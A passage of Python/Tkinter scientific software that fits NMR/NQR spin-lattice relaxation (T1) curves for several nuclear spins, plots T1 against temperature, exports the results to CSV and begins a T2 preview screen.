                        -(1+s2)*(0.1*np.exp(-(x/T12)**r)+0.9*np.exp(-(6*x/T12)**r)))
        def Fit_spin_3_2_1st(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 3/2'''
            return y0*(1-(1+s)*(0.1*np.exp(-(x/T1)**r)+0.5*np.exp(-(3*x/T1)**r)+0.4*np.exp(-(6*x/T1)**r)))
        def Fit_2exponential(x, T11=0.001, T12=0.01, y0=1000, s1=1, s2=1, r=1):
            '''T1 two component exponential fit for 1/2 spin'''
            return y0*(1 -(1+s1)*np.exp(-(x/T11)**r) -(1+s2)*np.exp(-(x/T12)**r))
        def Fit_spin_7_2_TaS2(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 7/2 on 1/2 - 3/2 transition; NQR'''
            return y0*(1-(1+s)*(0.024*np.exp(-(3*x/T1)**r)+0.235*np.exp(-(10*x/T1)**r)+0.741*np.exp(-(21*x/T1)**r)))
        def Fit_spin_7_2_TaS2_beta(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 7/2 on 1/2 - 3/2 transition; NQR'''
            return y0*(1-(1+s)*(0.036*np.exp(-(2.91*x/T1)**r)+0.314*np.exp(-(9.30*x/T1)**r)+0.651*np.exp(-(19.1*x/T1)**r)))
        def Fit_spin_5_2(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 5/2 on -1/2 - 1/2 transition; central line'''
            return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.177778*np.exp(-(6*x/T1)**r)+0.793651*np.exp(-(15*x/T1)**r)))
        def Fit_spin_5_2_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
            '''T1 fit model for spin 5/2 on -1/2 - 1/2 transition; central line'''
            return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.177778*np.exp(-(6*x/T11)**r)+0.793651*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.177778*np.exp(-(6*x/T12)**r)+0.793651*np.exp(-(15*x/T12)**r)))
        def Fit_spin_5_2_1st(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 5/2 on 1/2 - 3/2 transition; first sattelite'''
            return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.0535714*np.exp(-(3*x/T1)**r)+0.025*np.exp(-(6*x/T1)**r)+0.446429*np.exp(-(10*x/T1)**r)+0.446429*np.exp(-(15*x/T1)**r)))
        def Fit_spin_5_2_1st_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
            '''T1 fit model for spin 5/2 on 1/2 - 3/2 transition; first sattelite'''
            return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.0535714*np.exp(-(3*x/T11)**r)+0.025*np.exp(-(6*x/T11)**r)+0.446429*np.exp(-(10*x/T11)**r)+0.446429*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.0535714*np.exp(-(3*x/T12)**r)+0.025*np.exp(-(6*x/T12)**r)+0.446429*np.exp(-(10*x/T12)**r)+0.446429*np.exp(-(15*x/T12)**r)))
        def Fit_spin_5_2_2nd(x, T1=0.001, y0=1000, s=1, r=1):
            '''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
            return y0*(1-(1+s)*(0.0285714*np.exp(-(1*x/T1)**r)+0.214286*np.exp(-(3*x/T1)**r)+0.4*np.exp(-(6*x/T1)**r)+0.285714*np.exp(-(10*x/T1)**r)+0.0714286*np.exp(-(15*x/T1)**r)))
        def Fit_spin_5_2_2nd_dbl(x, T11=0.001, T12=0.001, y0=1000, s1=1, s2=1, r=1):
            '''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
            return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.214286*np.exp(-(3*x/T11)**r)+0.4*np.exp(-(6*x/T11)**r)+0.285714*np.exp(-(10*x/T11)**r)+0.0714286*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.214286*np.exp(-(3*x/T12)**r)+0.4*np.exp(-(6*x/T12)**r)+0.285714*np.exp(-(10*x/T12)**r)+0.0714286*np.exp(-(15*x/T12)**r)))
        def Fit_spin_5_2_2nd_tpl(x, T11=0.001, T12=0.001, T13=0.001, y0=1000, s1=1, s2=1, s3=1, r=1):
            '''T1 fit model for spin 5/2 on 3/2 - 5/2 transition; second sattelite'''
            return y0*(1-(1+s1)*(0.0285714*np.exp(-(1*x/T11)**r)+0.214286*np.exp(-(3*x/T11)**r)+0.4*np.exp(-(6*x/T11)**r)+0.285714*np.exp(-(10*x/T11)**r)+0.0714286*np.exp(-(15*x/T11)**r)) -(1+s2)*(0.0285714*np.exp(-(1*x/T12)**r)+0.214286*np.exp(-(3*x/T12)**r)+0.4*np.exp(-(6*x/T12)**r)+0.285714*np.exp(-(10*x/T12)**r)+0.0714286*np.exp(-(15*x/T12)**r)) -(1+s3)*(0.0285714*np.exp(-(1*x/T13)**r)+0.214286*np.exp(-(3*x/T13)**r)+0.4*np.exp(-(6*x/T13)**r)+0.285714*np.exp(-(10*x/T13)**r)+0.0714286*np.exp(-(15*x/T13)**r)))
        #reference to functions
        # [function, fit_params, start guess, label, tex_form]
        # NOTE(review): comment above lists 5 fields but each entry has
        # 4: [function, param names, start guess, display string]
        self.fit_names = {'Single Exp':[Fit_exponential, ['T1', 'y0', 's', 'r'],
                    [self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    'y0(1-(1+s)exp[-(x/T1)^r])'
                    ],
            'Spin 3/2':[Fit_spin_3_2, ['T1', 'y0', 's', 'r'],
                    [6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.1*exp(-(x/T1)**r)
                    +0.9*exp(-(6x/T1)**r)))'''
                    ],
            'Spin 3/2 double':[Fit_spin_3_2_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
                    [6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.1*exp(-(x/T1)**r)
                    +0.9*exp(-(6x/T1)**r)))'''
                    ],
            'Spin 3/2 1st':[Fit_spin_3_2_1st, ['T1', 'y0', 's', 'r'],
                    [6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.1*exp(-(x/T1)**r)
                    +0.5*exp(-(3x/T1)**r)))
                    +0.4*exp(-(6x/T1)**r)))'''
                    ],
            'Double Exp':[Fit_2exponential, ['T11','T12','y0','s1','s2','r'],
                    [self.trace.tau_list[self.trace.mean_range[0]-5],
                     self.trace.tau_list[self.trace.mean_range[0]-5]*10,
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1]/2,
                     self.trace.area_list[0]/self.trace.area_list[-1]*2,
                     1],
                    'y0(1-(1+s1)exp[-x/T11]-(1+s2)exp[-x/T12])'
                    ],
            'Spin 7/2 TaS2':[Fit_spin_7_2_TaS2, ['T1', 'y0', 's', 'r'],
                    [21*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.024*exp(-(3x/T1)**r)
                    +0.235*exp(-(10x/T1)**r)
                    +0.741*exp(-(21x/T1)**r)))'''
                    ],
            'Spin 7/2 TaS2 b':[Fit_spin_7_2_TaS2_beta, ['T1', 'y0', 's', 'r'],
                    [19*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.036*exp(-(2.91x/T1)**r)
                    +0.314*exp(-(9.30x/T1)**r)
                    +0.651*exp(-(19.1x/T1)**r)))'''
                    ],
            'Spin 5/2':[Fit_spin_5_2, ['T1', 'y0', 's', 'r'],
                    [15*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.029*exp(-(x/T1)**r)
                    +0.178*exp(-(6x/T1)**r)
                    +0.793*exp(-(15x/T1)**r)))'''
                    ],
            'Spin 5/2 double':[Fit_spin_5_2_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
                    [15*self.trace.tau_list[self.trace.mean_range[0]-5],
                     0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -0.5*self.trace.area_list[0]/self.trace.area_list[-1],
                     self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''sumi y0(1-(1+si)(
                    0.029*exp(-(x/T1i)**r)
                    +0.178*exp(-(6x/T1i)**r)
                    +0.793*exp(-(15x/T1i)**r)))'''
                    ],
            'Spin 5/2 1st':[Fit_spin_5_2_1st, ['T1', 'y0', 's', 'r'],
                    [10*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.029*exp(-(x/T1)**r)
                    +0.054*exp(-(3x/T1)**r)
                    +0.025*exp(-(6x/T1)**r)
                    +0.446*exp(-(10x/T1)**r)
                    +0.446*exp(-(15x/T1)**r)))'''
                    ],
            'Spin 5/2 1st double':[Fit_spin_5_2_1st_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
                    [2.5*10*self.trace.tau_list[self.trace.mean_range[0]-5],
                     5*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -0.5*self.trace.area_list[0]/self.trace.area_list[-1],
                     self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''sumi y0(1-(1+si)(
                    0.029*exp(-(x/T1i)**r)
                    +0.054*exp(-(3x/T1i)**r)
                    +0.025*exp(-(6x/T1i)**r)
                    +0.446*exp(-(10x/T1i)**r)
                    +0.446*exp(-(15x/T1i)**r)))'''
                    ],
            'Spin 5/2 2nd':[Fit_spin_5_2_2nd, ['T1', 'y0', 's', 'r'],
                    [6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''y0(1-(1+s)(
                    0.029*exp(-(x/T1)**r)
                    +0.214*exp(-(3x/T1)**r)
                    +0.400*exp(-(6x/T1)**r)
                    +0.286*exp(-(10x/T1)**r)
                    +0.071*exp(-(15x/T1)**r)))'''
                    ],
            'Spin 5/2 2nd double':[Fit_spin_5_2_2nd_dbl, ['T11', 'T12', 'y0', 's1', 's2', 'r'],
                    [2.5*6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -0.5*self.trace.area_list[0]/self.trace.area_list[-1],
                     self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''sumi y0(1-(1+si)(
                    0.029*exp(-(x/T1i)**r)
                    +0.214*exp(-(3x/T1i)**r)
                    +0.400*exp(-(6x/T1i)**r)
                    +0.286*exp(-(10x/T1i)**r)
                    +0.071*exp(-(15x/T1i)**r)))'''
                    ],
            'Spin 5/2 2nd triple':[Fit_spin_5_2_2nd_tpl, ['T11', 'T12', 'T13', 'y0', 's1', 's2', 's3', 'r'],
                    [2.5*6*self.trace.tau_list[self.trace.mean_range[0]-5],
                     0.2*self.trace.tau_list[self.trace.mean_range[0]-5],
                     0.05*self.trace.tau_list[self.trace.mean_range[0]-5],
                     np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
                     -0.5*self.trace.area_list[0]/self.trace.area_list[-1],
                     self.trace.area_list[0]/self.trace.area_list[-1],
                     self.trace.area_list[0]/self.trace.area_list[-1],
                     1],
                    '''sumi y0(1-(1+si)(
                    0.029*exp(-(x/T1i)**r)
                    +0.214*exp(-(3x/T1i)**r)
                    +0.400*exp(-(6x/T1i)**r)
                    +0.286*exp(-(10x/T1i)**r)
                    +0.071*exp(-(15x/T1i)**r)))'''
                    ]
            }
        def Fit():
            '''Executes the fit with given parameters and plots it.

            Reads the starting values from the entry boxes, runs
            scipy curve_fit, writes the fitted values back into the
            read-only result entries, and stores T1/y0/s/r plus the
            covariance matrix on self.trace.
            '''
            Fit_function = self.fit_names[self.combo_fit_var.get()][0]
            #read values from entry boxes
            start_params = dict()
            for entry,param in zip(self.entry_params_start, param_list):
                start_params[param]=float(entry.get())
            #data points
            x = self.trace.tau_list
            y = self.trace.area_list
            y_start = [Fit_function(xx, **start_params) for xx in x]
            #check if last parameter is enabled or not
            #(checkbox off -> stretch r is held fixed at its start value
            #and excluded from the fit)
            p_start = [start_params[key] for key in param_list]
            if not self.check_params_start_var.get():
                r_tmp = p_start.pop(-1)
                self.entry_params_fit[-1].config(state='normal')
                self.entry_params_fit[-1].delete(0, 'end')
                self.entry_params_fit[-1].insert('end', r_tmp)
                self.entry_params_fit[-1].config(state='readonly')
            #run fit, p_optimal, p_covariance matrix
            #the lambda's *param_list shadows the outer name on purpose:
            #it forwards all free parameters while pinning r=r_tmp
            if not self.check_params_start_var.get():
                popt,pcov = curve_fit(lambda x, *param_list: Fit_function(x, *param_list, r=r_tmp), x, y, p0=p_start)
            else:
                popt,pcov = curve_fit(Fit_function, x, y, p0=p_start)
            #readd last parameter
            if not self.check_params_start_var.get():
                popt = np.append(popt, r_tmp)
            y_fit = [Fit_function(xx, *popt) for xx in x]
            #print values to entry boxes
            for i,p in enumerate(popt):
                self.entry_params_fit[i].config(state='normal')
                self.entry_params_fit[i].delete(0, 'end')
                self.entry_params_fit[i].insert('end','%.4g' %p)
                self.entry_params_fit[i].config(state='readonly')
            #update plots
            self.axes_start_plot.set_ydata(y_start)
            self.axes_fit_plot.set_ydata(y_fit)
            self.fig_t1.canvas.draw()
            #save parameters
            self.trace.fit_params = popt
            self.trace.fit_param_cov = pcov
            self.trace.T1 = popt[0]
            #if self.check_params_start_var.get():
            self.trace.r = popt[-1]
            #else:
            #    self.trace.r = 1
            #NOTE(review): popt[1]/popt[2] are y0/s only for the
            #single-component models; for 'Double Exp' and the *_dbl/_tpl
            #models these indices hold T12 and y0 instead -- verify
            self.trace.y0 = popt[1]
            self.trace.s = popt[2]
            self.Refresh_parameters()
        def Change_fit(event=None):
            '''Changes the current fitting function'''
            #update memory in parent
            self.parent.temperatures.previous_t1['fit']=self.combo_fit_var.get()
            #repack the entries
            self.Fitting_frame()
            #rerun
            #Fit()
        #implement more options later if necessary
        self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
        self.label_fit.pack(side='top')
        self.combo_fit_var = tk.StringVar()
        #restore the last-used fit model, defaulting to 'Single Exp'
        try:
            self.combo_fit_var.set(self.parent.temperatures.previous_t1['fit'])
        except KeyError:
            self.combo_fit_var.set('Single Exp')
            self.parent.temperatures.previous_t1['fit']='Single Exp'
        self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
                                      textvar=self.combo_fit_var)
        self.combo_fit.pack(side='top')
        self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
        self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
        self.label_fit_fun.pack(side='top')
        self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
        self.label_starting_params.pack(side='top')
        param_list = self.fit_names[self.combo_fit_var.get()][1]
        #guesses for where params should start
        start_guess = self.fit_names[self.combo_fit_var.get()][2]
##        start_guess = [self.trace.tau_list[self.trace.mean_range[0]-5],
##                       np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
##                       -self.trace.area_list[0]/self.trace.area_list[-1],
##                       1]
##        if self.combo_fit_var.get() == 'Spin 3/2':
##            start_guess[0] = start_guess[0]*6
        #start parameters entry rows
        self.frame_params_start = list()
        self.label_params_start = list()
        self.entry_params_start = list()
        for i,param in enumerate(param_list):
            self.frame_params_start.append(tk.Frame(self.frame_fit))
            self.frame_params_start[i].pack(side='top', fill='y')
            self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
            self.label_params_start[i].pack(side='left', anchor='e')
            self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
                                                    width=10, justify='right'))
            self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
            self.entry_params_start[i].pack(side='left', anchor='e')
        #check button for stretch
        self.check_params_start_var = tk.BooleanVar(self, 0)
        #pre-check the box if a stretched fit was done before
        try:
            if self.trace.r != 1:
                self.check_params_start_var.set(1)
        except AttributeError: pass
        self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
                                                   variable=self.check_params_start_var))
        self.check_params_start.pack(side='left')
        self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
        self.button_fit.pack(side='top')
        self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
        self.label_fit_params.pack(side='top')
        #fit results entry rows
        self.frame_params_fit = list()
        self.label_params_fit = list()
        self.entry_params_fit = list()
        for i,param in enumerate(param_list):
            self.frame_params_fit.append(tk.Frame(self.frame_fit))
            self.frame_params_fit[i].pack(side='top', fill='y')
            self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
            self.label_params_fit[i].pack(side='left')
            self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
                                                  state='readonly', justify='right'))
            self.entry_params_fit[i].pack(side='left')
        #run first lap of fit
        Fit()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
        self.button_confirm.pack(side='bottom')
        self.button_confirm.bind('<Return>', self.Confirm)
        #add export csv button
        self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
        self.button_export.pack(side='bottom')
        self.button_export.bind('<F5>', self.Export)
    def Confirm(self, event=None):
        '''Confirm the selection in this screen'''
        #unpack, dont destroy untill series is done, in case corrections are needed
        self.parent.temperatures.wait.set(False)
        self.pack_forget()
        self.destroy()
        #move to later stages
        self.trace.analysed = True
    def Refresh_parameters(self):
        '''Refreshes the parameters table from the trace object.'''
        self.tree_parameters.delete(*self.tree_parameters.get_children())
        self.trace.Get_params()
        #GLOBAL_t1_displayed_params is a module-level list of attribute
        #names; missing attributes are skipped silently
        for item in GLOBAL_t1_displayed_params:
            try:
                pair = (item, self.trace.__dict__[item])
                self.tree_parameters.insert('', 'end', values=pair)
            except: pass
    def Export(self, event=None):
        '''Saves the datapoints of the plot to a CSV file.

        Writes tau/signal pairs to data/<experiment>/csv/T1_raw/.
        '''
        file_name = self.trace.file_key + '.csv'
        file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T1_raw', )
        #make the csv folder for old experiments
        #(best-effort: existing directory is the expected failure)
        try:
            os.mkdir(file_directory)
        except: pass
        #write file
        with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
            writer = csv.writer(f, delimiter=';')
            #name row
            writer.writerow(['tau(s)', 'Signal(a.u.)'])
            #data
            for i in range(len(self.trace.tau_list)):
                row = [self.trace.tau_list[i], self.trace.area_list[i]]
                writer.writerow(row)
        tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Plots the T1 trend and fits it.

        Data, start-guess curve, and fit curve are created here; the
        latter two are Line2D handles that Fit() updates in place.
        '''
        #data lines
        x = self.trace.tau_list
        y = self.trace.area_list
        #T1 plot
        self.axes = self.fig_t1.add_subplot(111)
        self.axes.plot(x, y, 'bo', color=colors[1], label='Data')
        self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
                                               linestyle='dashed', label='Fit start')
        self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
        #vertical marker at the start of the plateau averaging range
        self.axes.axvline(x=x[self.trace.mean_range[0]], color=colors[2])
        self.axes.set_xscale('log')
        self.axes.set_title('T1')
        self.axes.set_xlabel(r'$\tau$ (s)')
        self.axes.set_ylabel('Signal')
        legend = self.axes.legend(loc='lower right')
        self.axes.grid()
class Frame_plot_T1_t1vt(tk.Frame):
    '''T1-vs-temperature trend plotting.

    Aggregates the fitted results of all analysed, enabled temperature
    points into three plots (1/T1 vs T, center frequency vs T, stretch
    exponent vs T) and offers a CSV export of the trend.
    '''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        parent -- owning widget; carries .temperatures, .traces,
                  .current_trace and .current_experiment
        trace  -- dict-like series mapping temperature -> trace object
        '''
        tk.Frame.__init__(self, parent)
        self.pack(side='left', anchor='n')
        #reference to parent
        self.parent = parent
        #reference to current series
        self.trace = trace
        #counter for plots (picks a fresh color per added trace)
        self.counter = 0
        #load widgets
        self.Widgets()
    def Widgets(self):
        '''Builds all the subframes and canvases'''
        #button commands
        def Confirm(event=None):
            '''Confirm the selection in this screen'''
            #unpack, dont destroy untill series is done, in case corrections are needed
            self.parent.temperatures.wait.set(False)
            self.pack_forget()
            self.destroy()
            plt.close('all')
            self.parent.traces.button_show.config(state='normal')
        #split in columns
        self.frame_plot_left = tk.Frame(self)
        self.frame_plot_left.pack(side='left', anchor='n')
        self.frame_plot_right = tk.Frame(self)
        self.frame_plot_right.pack(side='left', anchor='n')
        #plot frames
        self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
        self.frame_plot1.pack(side='top', anchor='n')
        self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot2.pack(side='top', anchor='n')
        self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot3.pack(side='top', anchor='n')
        #buttons frame
        self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_buttons.pack(side='top', anchor='e')
        #T1 plot
        self.fig_t1vt = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_t1vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
        self.canvas_t1vt = FigureCanvasTkAgg(self.fig_t1vt, self.frame_plot1)
        self.canvas_t1vt._tkcanvas.pack()
        #fr plot
        self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
        self.canvas_fr._tkcanvas.pack()
        #stretch plot
        self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
        self.canvas_r._tkcanvas.pack()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
        self.button_confirm.pack(side='right')
        self.button_confirm.bind('<Return>', Confirm)
        #plot the stuff
        self.Fill_plot()
        #add button to export parameters
        self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
        self.button_export.pack(side='right')
    def Add_trace(self, trace):
        '''Adds traces to plots using given trace.

        NOTE(review): the *trace* argument is currently unused -- the
        method reads self.trace instead; the parameter is kept for
        interface compatibility with existing callers.
        '''
        #initialize lists
        x = list()
        y = list()
        fr = list()
        r = list()
        y0 = list()
        s = list()
        dT1 = list()
        #prepare all items for export
        popts = list()
        pcovs = list()
        #collect only analysed, enabled points
        for temp in self.trace:
            if self.trace[temp].analysed and not self.trace[temp].disabled:
                x.append(temp)
                y.append(self.trace[temp].T1)
                #maby calculate some center frequency at some point?
                fr.append(self.trace[temp].fr)
                #get stretch (default 1 when no stretched fit was done)
                try:
                    r.append(self.trace[temp].r)
                except AttributeError:
                    r.append(1)
                #get y0 and s if exist
                try:
                    y0.append(self.trace[temp].y0)
                    s.append(self.trace[temp].s)
                except AttributeError:
                    pass
                #1-sigma T1 error from the fit covariance
                dT1.append(np.sqrt(self.trace[temp].fit_param_cov[0][0]))
                popts.append(self.trace[temp].fit_params)
                pcovs.append(self.trace[temp].fit_param_cov)
        #sort by temperature
        sorting = np.argsort(x)
        x = np.array(x)[sorting]
        y = np.array(y)[sorting]
        y2 = 1/y
        fr = np.array(fr)[sorting]
        r = np.array(r)[sorting]
        y0 = np.array(y0)[sorting]
        s = np.array(s)[sorting]
        dT1 = np.array(dT1)[sorting]
        popts = np.array(popts)[sorting]
        pcovs = np.array(pcovs)[sorting]
        #draw trace (relaxation rate 1/T1, frequency, stretch)
        self.axes_1.plot(x, y2, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_3.plot(x, r, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        #save for export
        self.data = dict()
        self.data['T'] = x
        self.data['T1'] = y
        self.data['fr'] = fr
        self.data['r'] = r
        self.data['y0'] = y0
        self.data['s'] = s
        self.data['dT1'] = dT1
        self.data['popts'] = popts
        self.data['pcovs'] = pcovs
        #increase plot counter
        self.counter += 1
    def Export(self):
        '''Saves the plotted data into a CSV file for further analysis.

        One row per temperature point; the raw fitted parameters
        (popts) are appended after the 7 named columns, so rows can be
        longer than the header.
        '''
        file_name = self.parent.current_trace + '.csv'
        file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'T1')
        #make the csv folder (and any missing parents) for old experiments;
        #the previous try/os.mkdir/except silently failed when the parent
        #'csv' directory was missing, making the open() below crash
        os.makedirs(file_directory, exist_ok=True)
        #write file
        with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
            writer = csv.writer(f, delimiter=';')
            #name row
            writer.writerow(['T(K)', 'T1(s)', 'fr(MHz)', 'r', 'y0', 's', 'dT1'])
            #data
            for i in range(len(self.data['T'])):
                row = [self.data['T'][i], self.data['T1'][i], self.data['fr'][i], self.data['r'][i],
                       self.data['y0'][i], self.data['s'][i], self.data['dT1'][i]] + list(self.data['popts'][i])
                writer.writerow(row)
        tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Creates the (initially empty) axes for the T1vT plots.'''
        #relaxation rate vs temperature, log-log
        self.axes_1 = self.fig_t1vt.add_subplot(111)
        self.axes_1.set_xscale('log')
        self.axes_1.set_yscale('log')
        self.axes_1.set_title('T1 temperature dependence')
        self.axes_1.set_xlabel('Temperature (K)')
        self.axes_1.set_ylabel(r'1/T1 (1/s)')
        #self.axes_1.legend(loc='lower right')
        self.axes_1.grid()
        #center frequency vs temperature
        self.axes_2 = self.fig_fr.add_subplot(111)
        self.axes_2.set_title('Center frequencies')
        self.axes_2.set_xlabel('Temperature (K)')
        self.axes_2.set_ylabel('Frequency (MHz)')
        #self.axes_2.get_yaxis().get_major_formatter().set_useOffset(False)
        self.axes_2.margins(0.05, 0.1)
        self.axes_2.grid()
        #stretch exponent vs temperature
        self.axes_3 = self.fig_r.add_subplot(111)
        self.axes_3.set_title('Stretch')
        self.axes_3.set_xlabel('Temperature (K)')
        self.axes_3.set_ylabel('Stretch r')
        #self.axes_3.get_yaxis().get_major_formatter().set_useOffset(False)
        self.axes_3.margins(0.05, 0.1)
        self.axes_3.grid()
class Frame_plot_T2_quick(tk.Frame):
    '''Quick T2 preview screen.

    Runs the trace's Quick_T2() pass and shows temperature stability,
    the T2 decay, the phase and the shift-left (SHL) per file, with a
    draggable marker selecting how many initial points are averaged.
    '''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        parent -- owning widget; provides .temperatures.previous_t2
                  (remembered selections) used here and in Finish
        trace  -- T2 trace object; Quick_T2() supplies the plot tables
        '''
        tk.Frame.__init__(self, parent, bd=5)
        self.pack(side='left', fill='both', expand=True)
        #reference to parent
        self.parent = parent
        #reference to current trace:
        self.trace = trace
        #starting data (restore last used averaging range)
        self.range = self.parent.temperatures.previous_t2['mean_range'][1]
        #load widgets
        self.Widgets()
        #run quick t2
        quick_tables = trace.Quick_T2()
        self.Fill_plots(*quick_tables)
        #take focus away from listbox
        self.focus()
        #global key binds (root is the module-level Tk instance)
        root.bind('<Left>', self.Interrupt)
        root.bind('<Right>', self.Finish)
    def Finish(self, event=None):
        '''Accepts the data on this screen and closes it up.

        Saves the chosen averaging range, mean SHL and mean phase onto
        the trace, then opens the ranges screen.
        '''
        #save data
        self.trace.mean_range = (0, self.range)
        self.trace.mean_shl = int(self.mean_shl)
        self.trace.mean_phase = self.mean_phase
        self.parent.temperatures.previous_t2['mean_range']=(0, self.range)
        #hide this frame
        self.pack_forget()
        #close plots
        plt.close('all')
        #forget global key bind
        root.unbind('<Right>')
        root.unbind('<Left>')
        #run next frame
